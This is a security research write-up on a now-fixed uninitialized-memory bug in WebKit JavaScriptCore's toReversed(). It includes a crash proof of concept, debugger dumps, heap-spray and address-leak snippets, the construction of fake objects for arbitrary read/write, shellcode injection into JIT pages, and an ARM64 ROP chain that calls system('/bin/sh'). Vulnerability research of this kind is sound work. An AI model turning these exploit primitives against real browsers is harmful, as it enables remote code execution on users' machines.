The vulnerability introduced in commit 053d9a84 is a trivial uninitialized memory issue, easy to catch by simple unit tests. At the time of discovering the bug, we believed that this would be fixed very soon. However, for exploration purposes, we took it as a chance to study the current WebKit JavaScript Engine - JavaScriptCore internals, and document our journey for the sake of contributing to the security community.
Since it was fixed in a recent commit 9158c52, we decided to share the technical details of the vulnerability and how we successfully exploited it to gain RCE in JavaScriptCore.
The Vulnerability: Understanding Array.prototype.toReversed()
Starting from the commit 053d9a84, where a method, Array.prototype.toReversed()
, was reimplemented in Webkit. This method, designed to provide an efficient way to return a reversed copy of an array or string without modifying the original.
JSC_DEFINE_HOST_FUNCTION(arrayProtoFuncToReversed, (JSGlobalObject* globalObject, CallFrame* callFrame))
VM& vm = globalObject->vm();
auto scope = DECLARE_THROW_SCOPE(vm);
auto thisValue = callFrame->thisValue().toThis(globalObject, ECMAMode::strict());
if (UNLIKELY(thisValue.isUndefinedOrNull()))
return throwVMTypeError(globalObject, scope, "Array.prototype.fill requires that |this| not be null or undefined"_s);
auto* thisObject = thisValue.toObject(globalObject);
uint64_t length = toLength(globalObject, thisObject);
if (UNLIKELY(length > std::numeric_limits<uint32_t>::max())) { // [1]
throwRangeError(globalObject, scope, "Array length must be a positive integer of safe magnitude."_s);
return { };
if (isJSArray(thisObject)) { //[2]
JSArray* thisArray = jsCast<JSArray*>(thisObject);
auto fastResult = thisArray->fastToReversed(globalObject, length); //[3]
if (fastResult)
return JSValue::encode(fastResult);
When toReversed is called on a JavaScript object, it will make sure the length is safe (1) and the object itself is an array (2). If that’s the case, it will be cast to an array and called fastToReversed (3).
The Bug: Vector Length vs Public Length Mismatch
In the JavaScriptCore IndexingHeader class, publicLength
is public visible length (array.length), while vectorLength
is the length of the indexed property storage ( the actual size of storage it is holding).
When the program enters fastToReversed
, vectorLength
is calculated by optimalContiguousVectorLength
at [1] function, in case length
value is smaller than 3, especially equal 1, vectorLength
will be assigned a value of 3 at [1.2], while the butterfly publicLength
remains 1.
JSArray* JSArray::fastToReversed(JSGlobalObject* globalObject, uint64_t length)
ASSERT(length <= std::numeric_limits<uint32_t>::max());
VM& vm = globalObject->vm();
auto type = indexingType();
switch (type) {
case ArrayWithInt32:
case ArrayWithContiguous:
case ArrayWithDouble: {
if (length > this->butterfly()->vectorLength())
return nullptr;
Structure* resultStructure = globalObject->arrayStructureForIndexingTypeDuringAllocation(type);
IndexingType indexingType = resultStructure->indexingType();
if (UNLIKELY(hasAnyArrayStorage(indexingType)))
return nullptr;
auto srcData = this->butterfly()->contiguous().data();
if (hasDouble(indexingType)) {
if (holesMustForwardToPrototype() && containsHole(this->butterfly()->contiguousDouble().data(), static_cast<uint32_t>(length)))
return nullptr;
} else if (holesMustForwardToPrototype() && containsHole(srcData, static_cast<uint32_t>(length)))
return nullptr;
auto vectorLength = Butterfly::optimalContiguousVectorLength(resultStructure, length);//[1]
void* memory = vm.auxiliarySpace().allocate(
Butterfly::totalSize(0, 0, true, vectorLength * sizeof(EncodedJSValue)),
nullptr, AllocationFailureMode::ReturnNull);
if (UNLIKELY(!memory))
return nullptr;
auto* butterfly = Butterfly::fromBase(memory, 0, 0);
auto resultData = butterfly->contiguous().data();
memcpy(resultData, srcData, sizeof(JSValue) * length);//[2]
if (hasDouble(indexingType)) {
auto data = butterfly->contiguousDouble().data();
std::reverse(data, data + length); // [3]
} else
std::reverse(resultData, resultData + length);
return createWithButterfly(vm, nullptr, resultStructure, butterfly);
ALWAYS_INLINE unsigned Butterfly::optimalContiguousVectorLength(Structure* structure, unsigned vectorLength)
return optimalContiguousVectorLength(structure ? structure->outOfLineCapacity() : 0, vectorLength); //[1.1]
ALWAYS_INLINE unsigned Butterfly::optimalContiguousVectorLength(size_t propertyCapacity, unsigned vectorLength)
if (!vectorLength)
vectorLength = std::max(BASE_CONTIGUOUS_VECTOR_LEN, vectorLength);//[1.2]
return availableContiguousVectorLength(propertyCapacity, vectorLength);
Additionally, after initializing the necessary butterfly’s lengths, the function goes through memcpy
[2] and immediately performs a reverse operation [3] , leaving any leftover uninitialized if publicLength
is smaller than vectorLength
Proof of Concept
Here’s a simple PoC that triggers the vulnerability:
const v1 = [-1n]; // create a JSArray
let v2;
v2 = v1.toReversed();// call arrayProtoFuncToReversed
sleepSeconds(5); // pause execution
print(v2[2].print()); // access randomly a field of v2[2]
After running this PoC, the program crashes when trying to access a field in an uninitialized element. This behavior confirms that toReversed()
misses properly initialising additional elements when publicLength
is smaller than vectorLength
Object: 0x7fc8ab0094c8 with butterfly 0x7fc8a90927e8(base=0x7fc8a90927e0) (Structure 0x7fc7000060f0:[0x60f0/24816, Array, (0/0, 0/0){}, ArrayWithContiguous, Unknown, Proto:0x7fc8ab008988]), StructureID: 24816
pwndbg> tele 0x7fc8a90927e0
00:0000│ 0x7fc8a90927e0 ◂— 0x300000001
01:0008│ 0x7fc8a90927e8 —▸ 0x7fc8ab01e608 ◂— 0x100030000005210
02:0010│ 0x7fc8a90927f0 ◂— 0xbadbeef0 // uninitialized value
... ↓ 5 skipped
pwndbg> c
Thread 1 "jsc" received signal SIGSEGV, Segmentation fault.
0x00005641527ffa82 in llint_op_get_by_id ()
────────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────────────────────────────────────────────────────────────────
*RAX 0xfffffffffffffff5
*RCX 0xbadbeef0
*RDX 0x7fc8a9001390 ◂— 0
*RDI 0x7ffc350bd118 —▸ 0x7fc8a9400000 ◂— 3
*RSI 1
*R8 0xd4
*R9 0xd40000004
*R10 0x7fc8a9001770 ◂— 0x60f0
*R11 0xffffffff
*R12 0x7fc8a9001310 ◂— 0x68006800680068 /* 'h' */
*R13 0x7fc8ab070900 ◂— 0xfbf91c10fa9286
*R14 0xfffe000000000000
*R15 0xfffe000000000002
*RBP 0x7ffc350bd230 —▸ 0x7ffc350bd2a0 —▸ 0x7ffc350bdc40 —▸ 0x7ffc350bdd50 —▸ 0x7ffc350be0d0 ◂— ...
*RSP 0x7ffc350bd1a0 —▸ 0x7fc8a903a088 ◂— 0x128340000009440
*RIP 0x5641527ffa82 (llint_op_get_by_id+94) ◂— mov esi, dword ptr [rcx]
─────────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────────────────────────────────────────────────────────────────
► 0x5641527ffa82 <llint_op_get_by_id+94> mov esi, dword ptr [rcx] <Cannot dereference [0xbadbeef0]>
0x5641527ffa84 <llint_op_get_by_id+96> mov eax, dword ptr [rdx]
0x5641527ffa86 <llint_op_get_by_id+98> cmp eax, esi
0x5641527ffa88 <llint_op_get_by_id+100> jne llint_op_get_by_id+456 <llint_op_get_by_id+456>
0x5641527ffa8e <llint_op_get_by_id+106> movsxd rsi, dword ptr [rdx + 4]
0x5641527ffa92 <llint_op_get_by_id+110> cmp esi, 0x40
0x5641527ffa95 <llint_op_get_by_id+113> jl llint_op_get_by_id+126 <llint_op_get_by_id+126>
0x5641527ffa97 <llint_op_get_by_id+115> mov rcx, qword ptr [rcx + 8]
0x5641527ffa9b <llint_op_get_by_id+119> neg esi
0x5641527ffa9d <llint_op_get_by_id+121> movsxd rsi, esi
0x5641527ffaa0 <llint_op_get_by_id+124> jmp llint_op_get_by_id+133 <llint_op_get_by_id+133>
──────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffc350bd1a0 —▸ 0x7fc8a903a088 ◂— 0x128340000009440
01:0008│-088 0x7ffc350bd1a8 ◂— 0xa /* '\n' */
02:0010│-080 0x7ffc350bd1b0 —▸ 0x7ffc350bd1c0 —▸ 0x7ffc350bd230 —▸ 0x7ffc350bd2a0 —▸ 0x7ffc350bdc40 ◂— ...
03:0018│-078 0x7ffc350bd1b8 —▸ 0x7fc868e48038 ◂— movabs rdx, 0x7fc8a9400018 /* 0x7fc8a9400018ba48 */
04:0020│-070 0x7ffc350bd1c0 —▸ 0x7ffc350bd230 —▸ 0x7ffc350bd2a0 —▸ 0x7ffc350bdc40 —▸ 0x7ffc350bdd50 ◂— ...
05:0028│-068 0x7ffc350bd1c8 —▸ 0x7fc8ab0094c8 ◂— 0x1082409000060f0
06:0030│-060 0x7ffc350bd1d0 —▸ 0x7fc8ab054318 ◂— 0x108350000005440 /* '@T' */
07:0038│-058 0x7ffc350bd1d8 ◂— 0xbadbeef0
The Fix
The fix in commit 9158c52 simply memset
all remaining values to 0, NaN, or Undefined, ensuring proper initialization.
auto resultData = butterfly->contiguous().data();
memcpy(resultData, srcData, sizeof(JSValue) * length);//[3.2]
if (size_t remaining = vectorLength - length; remaining) {
if (hasDouble(type)) {
constexpr double pattern = PNaN;
memset_pattern8(static_cast<void*>(butterfly->contiguous().data() + length), &pattern, sizeof(JSValue) * remaining);
for (unsigned i = length; i < vectorLength; ++i)
butterfly->contiguousDouble().atUnsafe(i) = PNaN;
} else {
memset(static_cast<void*>(butterfly->contiguous().data() + length), 0, sizeof(JSValue) * remaining);
for (unsigned i = length; i < vectorLength; ++i)
Exploitation on Linux machine (x86-64 architecture)
Turning into read/write primitives
The next step is to gain arbitrary read/write. In order to do that, let’s again illustrate the internal array structure in JavaScriptCore. From the Frack article Attacking JavaScript Engines, Saleo describe butterfly concept in general as:
“Internally, JSC stores both properties and elements in the same memory region and stores a pointer to that region in the object itself. This pointer points to the middle of the region, properties are stored to the left of it (lower addresses) and elements to the right of it. There is also a small header located just before the pointed to address that contains the length of the element vector. This concept is called a “Butterfly” since the values expand to the left and right, similar to the wings of a butterfly.”
Leaking addresses
Since JSC arrays have dynamic types, and the uninitialized memory happens in an array value, we can simply spray the heap with some object pointers, free it with gc() , then trigger the vulnerability multiple times to force the allocation to reuse the heap. Then we can read the pointer from double arrays directly thus achieving memory leak. Illustration by snippet code below:
let spray_arr = new Array(0x20);
for (let i = 0; i < 0x40; i++) {
spray_arr[i] = [2.1*i, 2.2, 2.3]; // spray some arrays
gc(); // clean memory and force allocation reusing above’s heap
b1 = [1.1];
b1 = b1.toReversed();
let addr1 = f2i(b1[1]);// b1[1] is previous heap chunk and will be leaked
print ("leak1: " + hex(addr1));
Achieve Arbitrary Memory Write/Read
With a successful heap leak, we can now work towards crafting a fake object and achieving arbitrary read/write access:
Heap spraying for fake objects: We allocate a large number of pointers pointing to a predictable area inside the heap. Those pointers will be interpreted as object pointers when a toReversed()
object array catches them.
Triggering the bug again: We create more toReversed()
object arrays, which capture pointers we sprayed in step 1.
Structuring a fake object: By spraying Structure ID and butterfly pointer onto the area to which captured pointers pointing, we tricked JSC to interpret the sprayed pointers as valid object pointers.
This way of creating fakeObj is obviously not stable, and requires a lot of effort. In order to make our fakeObj bring more to the table, and avoid doing it again, the butterfly pointer should preferably point to our controlled double array, which gives us the ability to control its length. Since then, we got an out-of-bound array, making the remaining part of our exploit easier.
At this point, we gain three key primitives:
- AddrOf – Allows us to obtain the memory address of a JavaScript object.
- arbRead – Enables arbitrary memory reads by manipulating the fake object’s properties.
- arbWrite – Grants arbitrary memory writes by overlapping the fake object with a controlled double array.
With full read/write capabilities, we are now ready to take the final step—achieving code execution, breaking through JavaScriptCore’s security defenses. Code execution
After getting arbitrary read/write primitive, we easily overwrite shellcode into the JIT compiled page, and obtain shell execution.
Exploitation on macOS machine (ARM64 architecture)
With code execution successfully achieved on Linux (x86-64), our next challenge was to port the exploit to macOS (ARM64). Unlike its x86, macOS enforces stricter exploit mitigations, making direct exploitation significantly more challenging.
MacOS Challenges
On macOS running Apple Mx chips, several security mitigations prevent traditional exploitation techniques:
JIT Memory Protections: Unlike x86-64, JIT pages are no longer RWX (Read-Write-Execute). Instead, they are mapped as RX (Read-Execute) only, preventing attackers from injecting shellcode directly into executable memory.
Pointer Authentication (PAC): Many function pointers and return addresses are protected with PAC (Pointer Authentication Codes), making arbitrary code execution more difficult.
APRR (Authenticated Pointer Read Restriction): Certain memory regions, including JIT code pages, are protected from direct reading, which makes memory disclosure attacks less effective.
Our next step was bypassing JIT memory protections, since our previous approach of injecting shellcode into JIT pages no longer worked. And in this blog we only discuss how to overcome this mitigation, because others are more hardly touchable for us now.
Bypassing JIT Memory Protections
On this part, we found Ivan Krstić’s 2016 Black Hat talk . His presentation provided the evolution of IOS JIT hardenings. On iOS 9, JIT pages were still RWX. However, with iOS 10, Apple introduced stricter memory protections: On our understanding, this mitigation makes JIT pages dynamically switch between RW (Read-Write) and RX (Read-Execute) but are never RWX at the same time. Instead, they follow a Write XOR Execute (W^X) policy.
When JIT compiles code, the page is temporarily marked RW (Read-Write) but not executable. Once the JIT compilation is finished, the page is switched to RX (Read-Execute) but not writable.
For example, the function performJITMemcpy
function as the case enables writing permission on JIT page, but disable as soon as after memcpy
static ALWAYS_INLINE void* performJITMemcpy(void *dst, const void *src, size_t n)
if (g_jscConfig.useFastJITPermissions) {
threadSelfRestrict<MemoryRestriction::kRwxToRw>(); // change to RW
memcpyAtomicIfPossible(dst, src, n); // copy JIT code
threadSelfRestrict<MemoryRestriction::kRwxToRx>(); // rechange to RX
To achieve arbitrary code execution, we would need to either re-enable write permissions on an existing JIT page or use a ROP-based approach to call the system function (in case CFI was disabled, but we don’t know on Safari or other macOS system application as the same or not)
Technique: ROPing to Execute System Commands
Instead of modifying JIT code itself, we leveraged existing executable instructions within the JavaScriptCore binary to construct a ROP chain that would call system("/bin/sh").
Our approach was as follows:
- Leaking JSC address base and system() function address
By arbitrary read/write, we can easily leak JSC base address and other system functions:
const jscBase = mathExpAddr - JSC_BASE_TO_MATH_EXP;
print("jscBase: " + hex(jscBase));
// reading system_libc
var random_addr = arb_read(jscBase + 0x16110D8n);
print("random_addr: " + hex(random_addr));
var system_addr = random_addr + SYSTEM_RANDOM_GAP;
print("system_addr: " + hex(system_addr));
- Constructing the ROP Chain
Next step, we overwrite the JIT code address with a crafted ROP chain. Before directly jumping to a code address, we realized that we could control the x21 register’s memory, making it a useful target for gadget chaining.
(lldb) reg r
General Purpose Registers:
x0 = 0x000000010306c8dc
x1 = 0x0000000000000000
x2 = 0x000000016fdfe5b0
x3 = 0x000000010d160800
x4 = 0x000000000000160a
x5 = 0x000000016fdfe6e0
x6 = 0x0000000101040990
x7 = 0x0000000000000001
x8 = 0x0000000000000000
x9 = 0x0000000000000020
x10 = 0x00000000ffffffff
x11 = 0x0000000000000148
x12 = 0x0000000103b216aa JavaScriptCore`JSC::arrayConstructorTableIndex + 52
x13 = 0x0000000000000000
x14 = 0x000000000000001b
x15 = 0x0000000000000001
x16 = 0x000000019318b16c libsystem_pthread.dylib`pthread_getspecific
x17 = 0x00000001039c42f8 JavaScriptCore`jsc_llint_begin + 161528
x18 = 0x0000000000000000
x19 = 0x0000000000000000
x20 = 0x0000000103be8000 JavaScriptCore`g_config
x21 = 0x000000010108d440 /// JSC’s heap memory
x22 = 0x000000010d400050
x23 = 0x000000010d400000
x24 = 0x000000010104c408
x25 = 0x000000010d4401f0
x26 = 0x000000010d0c1a00
x27 = 0xfffe000000000000
x28 = 0xfffe000000000002
fp = 0x000000016fdfe730
lr = 0x00000001039c43e4 JavaScriptCore`jsc_llint_begin + 161764
sp = 0x000000016fdfe6e0
pc = 0x000000010306c8dc
cpsr = 0xa0001000
We then looked for gadgets that interact with x21, and found two key instruction sequences:
First Gadget: Modifying x0, x8, and x3, then branching to x3
This gadget enables us to control x0 (first function argument), x8 (load base), and x3 (function jump target) before executing a branch instruction (br x3):
(lldb) x/10i 0x10306c8dc
-> 0x10306c8dc: ldr x0, [x21, #0x10] // Load value from x21 into x0
0x10306c8e0: ldr x8, [x0] // Load x0’s base into x8
0x10306c8e4: ldr x3, [x8, #0x10] // Load x3, which will be our jump target
0x10306c8e8: mov x1, x20
0x10306c8ec: mov x2, x22
0x10306c8f0: ldp x29, x30, [sp, #0x30]
0x10306c8f4: ldp x20, x19, [sp, #0x20]
0x10306c8f8: ldp x22, x21, [sp, #0x10]
0x10306c8fc: add sp, sp, #0x40
0x10306c900: br x3 // Jump to x3 (controlled)
Second Gadget: Modifying x1 and x0, then branching to x1
This gadget allows us to set up x1 (second function argument) and x0 (first function argument) before branching to x1, effectively calling a function:
(lldb) x/10i 0x103ec014
-> 0x103ec014: ldr x1, [x8, #0x18] // Load x1
0x103ec018: ldr x0, [x0, #0x58] // Load x0
0x103ec01c: br x1 // Branch to x1 (controlled function call)
By combining these two gadgets, we can load the system() function address into x1, prepare its argument ("/bin/sh") in x0, and execute the call, effectively launching a shell.
The PAC Roadblock
While our ROP-based approach successfully exploited JavaScriptCore on macOS (ARM64), Pointer Authentication (PAC) remains an unbroken mitigation in this case. In a fully hardened macOS environment, our exploit would likely fail due to PAC verification, it’s a big challenge waiting for us.
In this blog, we explored JavaScriptCore exploitation, on x86-64 architecture and overcame one arm64 mitigation. This project was a valuable learning experience for us, laying the foundation for future Safari and JavaScriptCore research.
During understanding mitigation, we found the blog JITSploitation III: Subverting Control Flow, Saelo had described JIT memory protection as the small part of APRR “With the APRR register set up in this way, it would effectively enforce a strict W^X policy: no page could ever be writable and executable at the same time". So we were confused to explain both mitigations, in the end we decided to point out only JIT memory protection as we only discuss bypassing itself. If something goes wrong because lacking of our knowledge, please let us know, thank you everyone for reading our blog.
The PoC and exploitation scripts are available here.
Note changes after 3 years of attacking JSC (Saelo)
Diary of a reverse-engineer
Webkit Pwn2Own 2022
Introduce JavaScriptCore
Behind the Scenes with iOS Security
JITSploitation III: Subverting Control Flow